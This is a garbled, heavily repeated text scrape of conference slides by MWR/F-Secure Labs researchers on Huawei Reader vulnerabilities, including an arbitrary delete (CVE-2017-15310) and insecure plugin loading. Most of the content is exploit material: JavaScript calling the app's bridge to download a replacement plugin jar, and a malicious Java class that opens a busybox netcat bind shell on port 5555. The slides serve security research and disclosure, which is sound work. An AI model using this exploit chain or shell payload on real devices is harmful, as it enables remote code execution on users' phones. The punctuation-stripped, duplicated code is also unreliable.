It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 46: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/46.jpg)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 47: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/47.jpg)
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 48: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/48.jpg)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 49: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/49.jpg)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 50: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/50.jpg)
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 51: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/51.jpg)
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 52: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/52.jpg)
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 53: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/53.jpg)
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 54: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/54.jpg)
PUBLIC